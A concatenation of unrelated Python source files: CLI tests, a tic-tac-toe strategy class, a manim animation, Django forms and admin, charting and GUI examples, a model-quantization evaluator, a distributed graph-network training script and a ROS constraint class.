assert _cli.main([CMD, "--config-dir", runcli.config_dir]) != 0
assert runcli("config", "show") == 0
assert runcli("config", "list-codecs") == 0
# todo:
# check default creation- monkeypatch to avoid clobbering user dir
# pass a config and check that it matches
# config set
NET0 = "net7"
def test_get(runcli, client):
assert runcli("get") != 0
assert runcli("get", NET0) == 0
assert runcli("get", NET0, "--depth", "1") == 0
assert runcli("get", NET0, "-D", "2") == 0
def test_get_empty(runcli, client_empty):
assert runcli("get", NET0) != 0
assert runcli("get", NET0, "-R") == 0
def test_whois(runcli, client):
assert runcli("whois") != 0
assert runcli("whois", NET0) == 0
assert runcli("whois", "org7") == 0
assert runcli("whois", "as63312") == 0
assert runcli("whois", "as00000") == 1
assert runcli("whois", "ixnets7") == 0
assert runcli("whois", "ixnets0") == 1
def test_droptables(runcli, client, monkeypatch):
# not empty before drop?
assert client.tags.net.all()
# pass in "yes" confirmation
monkeypatch.setattr("sys.stdin", io.StringIO("yes"))
assert runcli("drop-tables") == 0
# empty after drop?
assert not client.tags.net.all()
# Test client/server version errors; should fail with clean output
def test_version_check(
runcli, client_empty, patch_version, patch_backend_version, capsys
):
with patch_version:
assert runcli("get", NET0, "-R") != 0
out, err = capsys.readouterr()
assert err.count("\n") < 2
with patch_backend_version:
assert runcli("get", NET0, "-R") != 0
# Make sure CLI output is piped to stdout
@pytest.mark.output
def test_output_piping(runcli, client, capsys):
assert runcli("sync") == 0
out, err = capsys.readouterr()
assert err == ""
assert re.search("Fetching", out)
assert re.search("Updates", out)
# Check sanity of output volume
@pytest.mark.output
def test_verbosity(runcli, client, capsys):
assert runcli("sync", "-v") == 0
outv, errv = capsys.readouterr()
assert runcli("sync", "-q") == 0
outq, errq = capsys.readouterr()
# Verbose output should be longer
assert len(outq) < len(outv)
|
1696198
|
import random
class Teacher:
"""
A class to implement a teacher that knows the optimal playing strategy.
Teacher returns the best move at any time given the current state of the game.
Note: things are a bit more hard-coded here, as this was not the main focus of
the exercise so I did not spend as much time on design/style. Everything works
properly when tested.
Parameters
----------
level : float
teacher ability level. This is a value between 0-1 that indicates the
probability of making the optimal move at any given time.
"""
def __init__(self, level=0.9):
"""
Ability level determines the probability that the teacher will follow
the optimal strategy as opposed to choosing a random available move.
"""
self.ability_level = level
def win(self, board, key='X'):
""" If we have two in a row and the 3rd is available, take it. """
# Check for diagonal wins
a = [board[0][0], board[1][1], board[2][2]]
b = [board[0][2], board[1][1], board[2][0]]
if a.count('-') == 1 and a.count(key) == 2:
ind = a.index('-')
return ind, ind
elif b.count('-') == 1 and b.count(key) == 2:
ind = b.index('-')
if ind == 0:
return 0, 2
elif ind == 1:
return 1, 1
else:
return 2, 0
# Now check for 2 in a row/column + empty 3rd
for i in range(3):
c = [board[0][i], board[1][i], board[2][i]]
d = [board[i][0], board[i][1], board[i][2]]
if c.count('-') == 1 and c.count(key) == 2:
ind = c.index('-')
return ind, i
elif d.count('-') == 1 and d.count(key) == 2:
ind = d.index('-')
return i, ind
return None
def blockWin(self, board):
""" Block the opponent if she has a win available. """
return self.win(board, key='O')
def fork(self, board):
""" Create a fork opportunity such that we have 2 threats to win. """
# Check all adjacent side middles
if board[1][0] == 'X' and board[0][1] == 'X':
if board[0][0] == '-' and board[2][0] == '-' and board[0][2] == '-':
return 0, 0
elif board[1][1] == '-' and board[2][1] == '-' and board[1][2] == '-':
return 1, 1
elif board[1][0] == 'X' and board[2][1] == 'X':
if board[2][0] == '-' and board[0][0] == '-' and board[2][2] == '-':
return 2, 0
elif board[1][1] == '-' and board[0][1] == '-' and board[1][2] == '-':
return 1, 1
elif board[2][1] == 'X' and board[1][2] == 'X':
if board[2][2] == '-' and board[2][0] == '-' and board[0][2] == '-':
return 2, 2
elif board[1][1] == '-' and board[1][0] == '-' and board[0][1] == '-':
return 1, 1
elif board[1][2] == 'X' and board[0][1] == 'X':
if board[0][2] == '-' and board[0][0] == '-' and board[2][2] == '-':
return 0, 2
elif board[1][1] == '-' and board[1][0] == '-' and board[2][1] == '-':
return 1, 1
# Check all cross corners
elif board[0][0] == 'X' and board[2][2] == 'X':
if board[1][0] == '-' and board[2][1] == '-' and board[2][0] == '-':
return 2, 0
elif board[0][1] == '-' and board[1][2] == '-' and board[0][2] == '-':
return 0, 2
elif board[2][0] == 'X' and board[0][2] == 'X':
if board[2][1] == '-' and board[1][2] == '-' and board[2][2] == '-':
return 2, 2
elif board[1][0] == '-' and board[0][1] == '-' and board[0][0] == '-':
return 0, 0
return None
def blockFork(self, board):
""" Block the opponents fork if she has one available. """
corners = [board[0][0], board[2][0], board[0][2], board[2][2]]
# Check all adjacent side middles
if board[1][0] == 'O' and board[0][1] == 'O':
if board[0][0] == '-' and board[2][0] == '-' and board[0][2] == '-':
return 0, 0
elif board[1][1] == '-' and board[2][1] == '-' and board[1][2] == '-':
return 1, 1
elif board[1][0] == 'O' and board[2][1] == 'O':
if board[2][0] == '-' and board[0][0] == '-' and board[2][2] == '-':
return 2, 0
elif board[1][1] == '-' and board[0][1] == '-' and board[1][2] == '-':
return 1, 1
elif board[2][1] == 'O' and board[1][2] == 'O':
if board[2][2] == '-' and board[2][0] == '-' and board[0][2] == '-':
return 2, 2
elif board[1][1] == '-' and board[1][0] == '-' and board[0][1] == '-':
return 1, 1
elif board[1][2] == 'O' and board[0][1] == 'O':
if board[0][2] == '-' and board[0][0] == '-' and board[2][2] == '-':
return 0, 2
elif board[1][1] == '-' and board[1][0] == '-' and board[2][1] == '-':
return 1, 1
# Check all cross corners (first check for double fork opp using the corners array)
elif corners.count('-') == 1 and corners.count('O') == 2:
return 1, 2
elif board[0][0] == 'O' and board[2][2] == 'O':
if board[1][0] == '-' and board[2][1] == '-' and board[2][0] == '-':
return 2, 0
elif board[0][1] == '-' and board[1][2] == '-' and board[0][2] == '-':
return 0, 2
elif board[2][0] == 'O' and board[0][2] == 'O':
if board[2][1] == '-' and board[1][2] == '-' and board[2][2] == '-':
return 2, 2
elif board[1][0] == '-' and board[0][1] == '-' and board[0][0] == '-':
return 0, 0
return None
def center(self, board):
""" Pick the center if it is available. """
if board[1][1] == '-':
return 1, 1
return None
def corner(self, board):
""" Pick a corner move. """
# Pick opposite corner of opponent if available
if board[0][0] == 'O' and board[2][2] == '-':
return 2, 2
elif board[2][0] == 'O' and board[0][2] == '-':
return 0, 2
elif board[0][2] == 'O' and board[2][0] == '-':
return 2, 0
elif board[2][2] == 'O' and board[0][0] == '-':
return 0, 0
# Pick any corner if no opposites are available
elif board[0][0] == '-':
return 0, 0
elif board[2][0] == '-':
return 2, 0
elif board[0][2] == '-':
return 0, 2
elif board[2][2] == '-':
return 2, 2
return None
def sideEmpty(self, board):
""" Pick an empty side. """
if board[1][0] == '-':
return 1, 0
elif board[2][1] == '-':
return 2, 1
elif board[1][2] == '-':
return 1, 2
elif board[0][1] == '-':
return 0, 1
return None
    def randomMove(self, board):
        """ Choose a random move from the available options. """
        possibles = []
        for i in range(3):
            for j in range(3):
                if board[i][j] == '-':
                    possibles += [(i, j)]
        return random.choice(possibles)
def makeMove(self, board):
"""
        The teacher goes through a hierarchy of moves, making the best move
        that is currently available each time. A tuple representing
        (row, col) is returned.
        """
        # Choose randomly with some probability so that the teacher does not always win
if random.random() > self.ability_level:
return self.randomMove(board)
# Follow optimal strategy
a = self.win(board)
if a is not None:
return a
a = self.blockWin(board)
if a is not None:
return a
a = self.fork(board)
if a is not None:
return a
a = self.blockFork(board)
if a is not None:
return a
a = self.center(board)
if a is not None:
return a
a = self.corner(board)
if a is not None:
return a
a = self.sideEmpty(board)
if a is not None:
return a
return self.randomMove(board)
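# Usage sketch: ask a perfect-play teacher (playing 'X') for a move on an
# empty board.
if __name__ == '__main__':
    board = [['-'] * 3 for _ in range(3)]
    teacher = Teacher(level=1.0)
    print(teacher.makeMove(board))  # (1, 1): the center is the first optimal pick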
|
1696208
|
from pathlib import Path
import numpy as np
from manim import *
class VectorAddition(Scene):
def construct(self):
VECT1 = np.array([3, 2, 0])
VECT2 = np.array([2, -1, 0])
VECT1_COLOR = "#b9b28b"
VECT2_COLOR = "#b98b99"
VECT3_COLOR = "#8ba7b9"
vect1 = Line(start=ORIGIN, end=VECT1, stroke_color=VECT1_COLOR).add_tip()
vect1_name = MathTex("\\vec{a}").next_to(vect1.get_center(), UP + LEFT * 2, buff=0.1).set_color(VECT1_COLOR)
vect2 = Line(start=VECT1, end=VECT1 + VECT2, stroke_color=VECT2_COLOR).add_tip()
vect2_name = MathTex("\\vec{b}").next_to(vect2.get_center(), UP * 2 + RIGHT, buff=0.1).set_color(VECT2_COLOR)
vect3 = Line(start=ORIGIN, end=VECT1 + VECT2, stroke_color=VECT3_COLOR, stroke_width=8).add_tip()
vect3_name = MathTex("\\vec{a} + \\vec{b}").next_to(vect3.get_center(), DOWN * 1.5, buff=0.1).set_color(VECT3_COLOR)
self.camera.frame_center = np.array([2.5, 1, 0])
self.play(GrowFromPoint(vect1, point=vect1.get_start()), Write(vect1_name), run_time=2)
self.wait()
self.play(GrowFromPoint(vect2, point=vect2.get_start()), Write(vect2_name), run_time=2)
self.wait()
self.play(LaggedStart(GrowFromPoint(vect3, point=vect3.get_start())), Write(vect3_name), run_time=3, lag_ratio=1)
self.wait(4)
if __name__ == '__main__':
# Generate animated gif.
config.background_color = WHITE
config.pixel_height = 300
config.pixel_width = 600
config.frame_width = 6
config.frame_height = 5
config.output_file = Path(__file__).resolve().parent.parent.parent / Path('notes/_media/vector-add-example')
config.format = 'gif'
scene = VectorAddition()
scene.render()
# Generate cover png.
config.save_last_frame = True
config.output_file = Path(__file__).resolve().parent.parent.parent / Path('notes/_media/vector-add-cover')
scene = VectorAddition()
scene.render()
|
1696264
|
import argparse
import format_helper
import madlibber
import path_helper
import word_helper
def parse_args():
"""Returns parsed arguments."""
parser = argparse.ArgumentParser()
parser.add_argument(
'-input_words',
type=str,
required=True,
help='The input words to substitute into templates.')
parser.add_argument(
'-input_sentence_templates',
type=str,
required=True,
help='The input sentence templates.')
parser.add_argument(
'-output_file',
type=str,
required=True,
help='The output file of filled in templates.')
return parser.parse_args()
def main():
args = parse_args()
ph = path_helper.PathHelper(args.input_words, args.input_sentence_templates,
args.output_file)
wh = word_helper.WordHelper(format_helper.FormatHelper)
m = madlibber.Madlibber(ph, format_helper.FormatHelper, wh)
m.load_sanity_check_templates_and_infer_word_categories()
m.load_and_sanity_check_words()
m.display_statistics()
should_fill = input('Do you wish to generate the sentences? [y/N]')
if should_fill == 'y':
m.fill_templates()
print('Done. Exiting...')
if __name__ == '__main__':
main()
|
1696275
|
from django import forms
from ftp.models import Account
from web.models import VHost
class AccountCreateForm(forms.ModelForm):
password = forms.CharField(widget=forms.widgets.PasswordInput)
vhost = forms.ModelChoiceField(queryset=VHost.objects.all(), empty_label="/", required=False)
class Meta:
model = Account
fields = ('name', 'password', 'vhost', 'path')
class AccountUpdateForm(forms.ModelForm):
new_password = forms.CharField(required=False, widget=forms.widgets.PasswordInput)
vhost = forms.ModelChoiceField(queryset=VHost.objects.all(), empty_label="/", required=False)
class Meta:
model = Account
fields = ('vhost', 'path')
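# Usage sketch (hypothetical data): validate and save a new FTP account.
#
#     form = AccountCreateForm(data={'name': 'alice', 'password': 's3cret',
#                                    'path': '/srv/ftp/alice'})
#     if form.is_valid():
#         form.save()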
|
1696288
|
import math
from pyjamas.chart import GChartUtil
from pyjamas.chart.GChart import GChart
from pyjamas.chart import AnnotationLocation
from pyjamas.chart import SymbolType
from pyjamas.ui.Button import Button
from pyjamas.ui.FocusPanel import FocusPanel
from pyjamas.ui.Grid import Grid
from pyjamas.ui import KeyboardListener
from pyjamas import DOM
"""*
* Example of how to add direct keyboard support to a GChart
* by wrapping it within a FocusPanel.
* <p>
*
* The example lets the user press the left and right arrow keys
* to move the selection to the point before or after the
* currently selected point.
*
* For the more common case where you are handling mouse click
* events only, as of v2.61, GChart implements both GWT's
* HasMouse*Handlers and HasClickHandlers interfaces (c.f.
* GChartExample24.java) so this wrapper technique is usually not
* needed.
*
"""
N_POINTS = 100
BLUE = "#318ce0"
SKY_BLUE = "#c6defa"
class ChildGChart(GChart):
def __init__(self):
GChart.__init__(self)
self.setChartTitle(
"Click on chart, then use left/right arrows to switch selected point")
self.setHoverTouchingEnabled(True)
self.setChartSize(500, 150)
self.setPadding("10px")
self.getXAxis().setTickCount(11)
self.getYAxis().setTickCount(11)
self.addCurve()
for i in range(N_POINTS+1):
self.getCurve().addPoint(i, math.sin((2* math.pi * i)/N_POINTS))
self.getCurve().getSymbol().setWidth(5)
self.getCurve().getSymbol().setBorderColor(BLUE)
self.getCurve().getSymbol().setBackgroundColor(SKY_BLUE)
self.getCurve().getSymbol().setHoverSelectionBackgroundColor(BLUE)
self.getCurve().getSymbol().setHoverSelectionBorderColor(SKY_BLUE)
self.getCurve().getSymbol().setSymbolType(
SymbolType.VBAR_BASELINE_CENTER)
self.getCurve().getSymbol().setHoverLocation(
AnnotationLocation.NORTH)
self.getCurve().getSymbol().setHoverYShift(5)
self.setPixelSize(self.getXChartSizeDecorated(),
self.getYChartSizeDecorated())
class GChartExample25 (FocusPanel):
def __init__(self):
FocusPanel.__init__(self)
self.theChild = ChildGChart()
self.theChild.update()
self.setWidget(self.theChild)
self.addKeyboardListener(self)
self.addMouseListener(self)
def onKeyDown(self, sender, keycode, modifiers):
event = DOM.eventGetCurrentEvent()
DOM.eventPreventDefault(event)
# ignore mouse position when arrow-key pressing
if self.theChild.getHoverTouchingEnabled():
self.theChild.setHoverTouchingEnabled(False)
p = self.theChild.getTouchedPoint()
        c = self.theChild.getCurve()  # only one curve on chart
iPoint = 0
if p is not None:
iPoint = c.getPointIndex(p)
if keycode == KeyboardListener.KEY_LEFT:
iPoint = (iPoint + N_POINTS) % (N_POINTS+1)
elif keycode == KeyboardListener.KEY_RIGHT:
iPoint = (iPoint + 1) % (N_POINTS+1)
self.theChild.touch(c.getPoint(iPoint))
self.theChild.update()
def onMouseMove(self, sender, x, y):
event = DOM.eventGetCurrentEvent()
DOM.eventPreventDefault(event)
# mousing auto re-enables mouse-over hover feedback
if not self.theChild.getHoverTouchingEnabled():
self.theChild.setHoverTouchingEnabled(True)
self.theChild.update()
def setOptimizeForMemory(self, optimize):
self.theChild.setOptimizeForMemory( optimize)
def update(self):
self.theChild.update()
|
1696293
|
from typing import Dict, Union
import os
import torch
import tqdm
import onnx
from torch.utils.data import DataLoader
from torchvision.datasets import ImageFolder, ImageNet
from furiosa_sdk_quantizer.evaluator.model_caller import ModelCaller
from furiosa_sdk_quantizer.evaluator.data_loader import random_subset
from furiosa_sdk_quantizer.evaluator.model_executor import ModelExecutor
from furiosa_sdk_quantizer.evaluator.evaluation_metric import ClassificationAccuracy
os.environ["KMP_DUPLICATE_LIB_OK"] = "Tru"
def run_eval(
model_class,
model_type,
val_dir,
cal_dir=None,
num_eval=100,
batch_size=1,
quantize=False,
is_print=False,
) -> Dict[str, float]:
caller = ModelCaller(model_class, model_type)
model, transform = caller.call()
if model_type == "onnx":
from furiosa_sdk_quantizer.frontend.onnx import optimize_model
model = optimize_model(model)
if model_type == "onnx" and quantize:
from furiosa_sdk_quantizer.frontend.onnx import (
build_calibration_model,
ONNXCalibrator,
quantize,
)
calibration_model = build_calibration_model(model)
calibration_dataset = ImageFolder(cal_dir, transform=model_class.model_config["transform"])
dynamic_ranges = ONNXCalibrator(
calibration_model,
).calibrate_with_data_loader(DataLoader(calibration_dataset))
# set mode=1 <==> simulated quantization
model = quantize(
model, per_channel=True, static=True, mode=1, dynamic_ranges=dynamic_ranges
)
num_params = caller.param_count
num_macs = caller.mac_count
if is_print:
print(
f"model {caller.model_name} called.\n"
f"\tparam count: {num_params:,}\n"
f"\tmac_count: {num_macs:,}\n"
)
dataset = ImageNet(val_dir, split="val", transform=transform)
# `seed` is fixed to 1 because we need to get the same subset of
# `dataset` across multiple executions.
dataset = random_subset(dataset, num_eval, seed=1)
# The `shuffle` argument of DataLoader.__init__ does not have to be
# set to True because we are evaluating, not training, the model.
loader = DataLoader(dataset, batch_size)
if is_print:
print(f"backend: {model_type}")
print(f"feed {num_eval} samples with batch_size {batch_size}.\n")
accuracy = evaluate(model, loader, is_print)
return {"n_params": num_params, "n_macs": num_macs, **accuracy}
def evaluate(
model: Union[onnx.ModelProto, torch.nn.Module], loader: DataLoader, is_print: bool = False
) -> Dict[str, float]:
executor = ModelExecutor(model)
metric = ClassificationAccuracy()
for input, target in tqdm.tqdm(loader):
pred = executor.feed(input)
metric.measure(pred, target)
if is_print:
print("eval results:")
metric.print_result()
print("end of eval.")
accuracy = metric.announce()
return {
"top1_acc": accuracy["top1"],
"top5_acc": accuracy["top5"],
}
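# Usage sketch (placeholder dataset paths; `model_class` and `model_type`
# follow the ModelCaller conventions above):
#
#     results = run_eval(model_class, "onnx", val_dir="/data/imagenet",
#                        cal_dir="/data/calib", num_eval=100, quantize=True)
#     # -> {'n_params': ..., 'n_macs': ..., 'top1_acc': ..., 'top5_acc': ...}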
|
1696303
|
import unittest
import sys
from PyQt5.QtWidgets import QApplication, QDialog
from ui import FetchProgressDialog
app = QApplication(sys.argv)
fetch_progress_dialog = QDialog()
fetch_progress_dialog_ui = FetchProgressDialog.Ui_FetchProgressDialog()
fetch_progress_dialog_ui.setupUi(fetch_progress_dialog)
class FetchProgressDialogTests(unittest.TestCase):
def test_defaults(self):
'''Test the defaults'''
self.assertEqual(fetch_progress_dialog_ui.status_label.text(), "Fetching...")
self.assertEqual(fetch_progress_dialog_ui.progress_bar.text(), "24%")
def test_button(self):
okWidget = fetch_progress_dialog_ui.buttonBox.Ok
self.assertIsNotNone(okWidget)
retryWidget = fetch_progress_dialog_ui.buttonBox.Retry
self.assertIsNotNone(retryWidget)
cancelWidget = fetch_progress_dialog_ui.buttonBox.Cancel
self.assertIsNotNone(cancelWidget)
if __name__ == '__main__':
unittest.main()
|
1696306
|
import os
import time
import numpy as np
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import ray
from ray.util.sgd import TorchTrainer
from ray.util.sgd.utils import AverageMeterCollection
from ray.util.sgd.torch import TrainingOperator
import dgl
from dgl.data import RedditDataset
from dgl.nn.pytorch import GATConv
from torch.utils.data import DataLoader
from dgl.dataloading import NodeCollator
print("Current Path: " + os.getcwd())
torch.manual_seed(42)
# define the model class
class GAT(nn.Module):
def __init__(self, in_feats, n_hidden, n_classes, n_layers, n_heads,
activation, feat_drop, attn_drop, negative_slope, residual):
super().__init__()
self.n_layers = n_layers
self.activation = activation
self.n_hidden = n_hidden
self.n_heads = n_heads
self.n_classes = n_classes
self.convs = nn.ModuleList()
# input layer
self.convs.append(
GATConv((in_feats, in_feats), n_hidden, n_heads, feat_drop,
attn_drop, negative_slope, residual, self.activation))
# hidden layer
for _ in range(1, n_layers - 1):
# due to multi-head, the in_dim = num_hidden * num_heads
self.convs.append(
GATConv((n_hidden * n_heads, n_hidden * n_heads), n_hidden,
n_heads, feat_drop, attn_drop, negative_slope,
residual, self.activation))
# output layer
self.convs.append(
GATConv((n_hidden * n_heads, n_hidden * n_heads), n_classes,
n_heads, feat_drop, attn_drop, negative_slope, residual,
None))
def forward(self, blocks, x):
h = x
for i, (layer, block) in enumerate(zip(self.convs, blocks)):
h_dst = h[:block.number_of_dst_nodes()]
if i != len(self.convs) - 1:
h = layer(block, (h, h_dst)).flatten(1)
h = F.dropout(h, p=0.5, training=self.training)
else:
h = layer(block, (h, h_dst))
h = h.mean(1)
return h.log_softmax(dim=-1)
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (torch.argmax(pred, dim=1) == labels).float().sum() / len(pred)
class CustomTrainingOperator(TrainingOperator):
def setup(self, config):
# load reddit data
data = RedditDataset()
g = data[0]
g.ndata["features"] = g.ndata["feat"]
g.ndata["labels"] = g.ndata["label"]
self.in_feats = g.ndata["features"].shape[1]
self.n_classes = data.num_classes
# add self loop,
g = dgl.remove_self_loop(g)
g = dgl.add_self_loop(g)
# Create csr/coo/csc formats before launching training processes
g.create_formats_()
self.g = g
train_nid = torch.nonzero(g.ndata["train_mask"], as_tuple=True)[0]
val_nid = torch.nonzero(g.ndata["val_mask"], as_tuple=True)[0]
test_nid = torch.nonzero(g.ndata["test_mask"], as_tuple=True)[0]
self.train_nid = train_nid
self.val_nid = val_nid
self.test_nid = test_nid
# Create sampler
sampler = dgl.dataloading.MultiLayerNeighborSampler(
[int(fanout) for fanout in config["fan_out"].split(",")])
# Create PyTorch DataLoader for constructing blocks
collator = NodeCollator(g, train_nid, sampler)
train_dataloader = DataLoader(
collator.dataset,
collate_fn=collator.collate,
batch_size=config["batch_size"],
shuffle=False,
drop_last=False,
num_workers=config["sampling_num_workers"])
# Define model and optimizer, residual is set to True
model = GAT(self.in_feats, config["n_hidden"], self.n_classes,
config["n_layers"], config["n_heads"], F.elu,
config["feat_drop"], config["attn_drop"],
config["negative_slope"], True)
self.convs = model.convs
# Define optimizer.
optimizer = torch.optim.Adam(model.parameters(), lr=config["lr"])
# Register model, optimizer, and loss.
self.model, self.optimizer = self.register(
models=model, optimizers=optimizer)
# Register data loaders.
self.register_data(train_loader=train_dataloader)
def train_epoch(self, iterator, info):
meter_collection = AverageMeterCollection()
iter_tput = []
model = self.model
# for batch_idx,batch in enumerate(iterator):
for step, (input_nodes, seeds, blocks) in enumerate(iterator):
tic_step = time.time()
# do some train
optimizer = self.optimizer
device = 0
if self.use_gpu:
blocks = [block.int().to(device) for block in blocks]
batch_inputs = blocks[0].srcdata["features"]
batch_labels = blocks[-1].dstdata["labels"]
batch_pred = model(blocks, batch_inputs)
loss = F.nll_loss(batch_pred, batch_labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
iter_tput.append(len(seeds) / (time.time() - tic_step))
if step % 20 == 0:
acc = compute_acc(batch_pred, batch_labels)
gpu_mem_alloc = torch.cuda.max_memory_allocated(
) / 1000000 if torch.cuda.is_available() else 0
print("Epoch {:05d} | Step {:05d} | Loss {:.4f} | "
"Train Acc {:.4f} | Speed (samples/sec) {:.4f} | GPU "
"{:.1f} MB".format(info["epoch_idx"] + 1, step,
loss.item(), acc.item(),
np.mean(iter_tput[3:]),
gpu_mem_alloc))
status = meter_collection.summary()
return status
def validate(self, validation_loader, info):
meter_collection = AverageMeterCollection()
model = self.model
n_layers = self.config["n_layers"]
n_hidden = self.config["n_hidden"]
n_heads = self.config["n_heads"]
batch_size = self.config["batch_size"]
num_workers = self.config["sampling_num_workers"]
g = self.g
train_nid = self.train_nid
val_nid = self.val_nid
test_nid = self.test_nid
device = 0
model.eval()
with torch.no_grad():
x = g.ndata["features"]
for i, layer in enumerate(self.convs):
if i < n_layers - 1:
y = torch.zeros(
g.number_of_nodes(), n_hidden * n_heads
if i != len(self.convs) - 1 else self.n_classes)
else:
y = torch.zeros(
g.number_of_nodes(), n_hidden
if i != len(self.convs) - 1 else self.n_classes)
sampler = dgl.dataloading.MultiLayerFullNeighborSampler(1)
collator = NodeCollator(g, torch.arange(g.number_of_nodes()),
sampler)
dataloader = DataLoader(
collator.dataset,
collate_fn=collator.collate,
batch_size=batch_size,
shuffle=False,
drop_last=False,
num_workers=num_workers)
for input_nodes, output_nodes, blocks in dataloader:
block = blocks[0]
# print("block:",block)
block = block.int().to(device)
h = x[input_nodes].to(device)
h_dst = x[output_nodes].to(device)
if i != len(self.convs) - 1:
h = layer(block, (h, h_dst)).flatten(1)
else:
h = layer(block, (h, h_dst)).mean(1)
h = h.log_softmax(dim=-1)
y[output_nodes] = h.cpu()
x = y
pred = y
labels = g.ndata["labels"]
_, val_acc, test_acc = compute_acc(pred[train_nid], labels[
train_nid]), compute_acc(pred[val_nid], labels[val_nid]), \
compute_acc(pred[test_nid], labels[test_nid])
metrics = {
"num_samples": pred.size(0),
"val_acc": val_acc.item(),
"test_acc": test_acc.item()
}
meter_collection.update(metrics, n=metrics.pop("num_samples", 1))
status = meter_collection.summary()
return status
def run(num_workers, use_gpu, num_epochs, lr, batch_size, n_hidden, n_layers,
n_heads, fan_out, feat_drop, attn_drop, negative_slope,
sampling_num_workers):
trainer = TorchTrainer(
training_operator_cls=CustomTrainingOperator,
num_workers=num_workers,
use_gpu=use_gpu,
backend="nccl",
config={
"lr": lr,
"batch_size": batch_size,
"n_hidden": n_hidden,
"n_layers": n_layers,
"n_heads": n_heads,
"fan_out": fan_out,
"feat_drop": feat_drop,
"attn_drop": attn_drop,
"negative_slope": negative_slope,
"sampling_num_workers": sampling_num_workers
})
for i in range(num_epochs):
trainer.train()
validation_results = trainer.validate()
trainer.shutdown()
print(validation_results)
print("success!")
# Use ray.init(address="auto") if running on a Ray cluster.
if __name__ == "__main__":
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument("--num-workers", type=int, default=2)
argparser.add_argument("--use-gpu", type=bool, default=True)
argparser.add_argument("--num-epochs", type=int, default=2)
argparser.add_argument("--lr", type=float, default=0.001)
argparser.add_argument("--batch-size", type=int, default=1024)
argparser.add_argument("--n-hidden", type=int, default=128)
argparser.add_argument("--n-layers", type=int, default=2)
argparser.add_argument("--n-heads", type=int, default=4)
argparser.add_argument("--fan-out", type=str, default="10,25")
argparser.add_argument("--feat-drop", type=float, default=0.)
argparser.add_argument("--attn-drop", type=float, default=0.)
argparser.add_argument("--negative-slope", type=float, default=0.2)
argparser.add_argument(
"--sampling-num-workers",
type=int,
default=0,
help="Number of sampling processes. Use 0 for no extra process.")
argparser.add_argument(
"--address",
required=False,
type=str,
help="The address to use for ray")
args = argparser.parse_args()
ray.init(address=args.address)
run(num_workers=args.num_workers,
use_gpu=args.use_gpu,
num_epochs=args.num_epochs,
lr=args.lr,
batch_size=args.batch_size,
n_hidden=args.n_hidden,
n_layers=args.n_layers,
n_heads=args.n_heads,
fan_out=args.fan_out,
feat_drop=args.feat_drop,
attn_drop=args.attn_drop,
negative_slope=args.negative_slope,
sampling_num_workers=args.sampling_num_workers)
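    # Example invocation (hypothetical script name):
    #
    #     python train_gat_reddit.py --num-workers 2 --use-gpu True \
    #         --num-epochs 2 --batch-size 1024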
|
1696473
|
from django.contrib import admin
from django.db import models
from django_summernote.widgets import SummernoteWidget, SummernoteInplaceWidget
from django_summernote.models import Attachment
from django_summernote.settings import summernote_config
__widget__ = SummernoteWidget if summernote_config['iframe'] \
else SummernoteInplaceWidget
class SummernoteInlineModelAdmin(admin.options.InlineModelAdmin):
formfield_overrides = {models.TextField: {'widget': __widget__}}
class SummernoteModelAdmin(admin.ModelAdmin):
formfield_overrides = {models.TextField: {'widget': __widget__}}
class AttachmentAdmin(admin.ModelAdmin):
list_display = ['name', 'file', 'uploaded']
search_fields = ['name']
ordering = ('-id',)
admin.site.register(Attachment, AttachmentAdmin)
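# Usage sketch (hypothetical `Post` model): every TextField on the model is
# rendered with the Summernote widget in the admin.
#
#     from myapp.models import Post
#
#     @admin.register(Post)
#     class PostAdmin(SummernoteModelAdmin):
#         pass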
|
1696487
|
import rospy

from rated_statistic_storage import *
from constraint_item import *
class Constraint(object):
"""Contains the whole constraint with corresponding reactions.
"""
def __init__(
self, name, constraint_root, planned_reaction,
min_reaction_interval, reaction_timeout):
super(Constraint, self).__init__()
#: The name of the constraint. Useful for debugging.
#: :type: string
self.__name = name
#: The root of the constraint tree.
#: :type: ConstraintItem
self.__constraint_root = constraint_root
        #: Time since when this constraint has been true.
        #: Note: if true_since is 0, the constraint has not been true yet.
#: :type: rospy.Time
self.true_since = rospy.Time(0)
        #: A list of reactions that should be executed if the constraint
#: has been true longer than min_reaction_interval milliseconds.
#: :type: list of Reactions
self.planned_reaction = planned_reaction
#: The minimum time needed that the constraint needs to be true to
#: execute the planned reactions.
#: :type: rospy.Duration
self.__min_reaction_interval = min_reaction_interval
        #: The time at which the reactions were last executed.
        #: rospy.Time(0) if they have never been executed.
#: :type: rospy.Time
self.__last_reaction = rospy.Time(0)
        #: Minimum duration that must pass before a reaction can happen again.
#: :type: rospy.Duration
self.__reaction_timeout = reaction_timeout
#: True if the current state of the constraint says that
#: an execution of the reactions is necessary.
self.evaluation_result = False
def evaluate_constraint(self, storage):
"""Evaluates this constraint and sets the attributes
according to the result of the evaluation.
:param storage: The storage where the incoming statistics are saved.
:type storage: RatedStatisticStorage
"""
evaluation = self.__constraint_root.evaluate_constraint(storage)
        # If the constraint is false, reset true_since and the evaluation result.
if not evaluation:
self.true_since = rospy.Time(0)
self.evaluation_result = False
else:
if self.true_since == rospy.Time(0):
self.true_since = rospy.Time.now()
if (
(rospy.Time.now() - self.true_since
>= self.__min_reaction_interval)
and
(rospy.Time.now() - self.__last_reaction
>= self.__reaction_timeout)):
self.evaluation_result = True
return
def notify_of_execution(self):
""" Tells this constraint that its reactions have just been executed.
        Note: it's important to notify this constraint so it knows how long
        ago the last execution was and does not execute too often.
"""
self.evaluation_result = False
self.__last_reaction = rospy.Time.now()
def __str__(self):
return self.__name
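# Illustrative sketch (assumes `root` is a ConstraintItem, `storage` a
# RatedStatisticStorage and `reactions` a list of Reaction objects):
#
# c = Constraint('cpu_load', root, reactions,
#                rospy.Duration(5), rospy.Duration(30))
# c.evaluate_constraint(storage)
# if c.evaluation_result:
#     ...  # execute the planned reactions here
#     c.notify_of_execution()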
|
1696523
|
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase
from post.models import Channel, Question
from post.forms import post_form
class TestPostViews(TestCase):
@classmethod
def setUpTestData(cls):
user = User.objects.create_user(username="username", password="password")
user.save()
Channel.objects.create(name="testing1")
Channel.objects.create(name="testing2")
# post urls
cls.purl_ques = reverse('submit', args=['question'])
cls.purl_disc = reverse('submit', args=['discussion'])
def test_ask(self):
url = reverse('ask')
expected_url = "/new/ask"
self.assertEqual(url, expected_url)
resp = self.client.get(url)
# Should redirect to home if not logged in
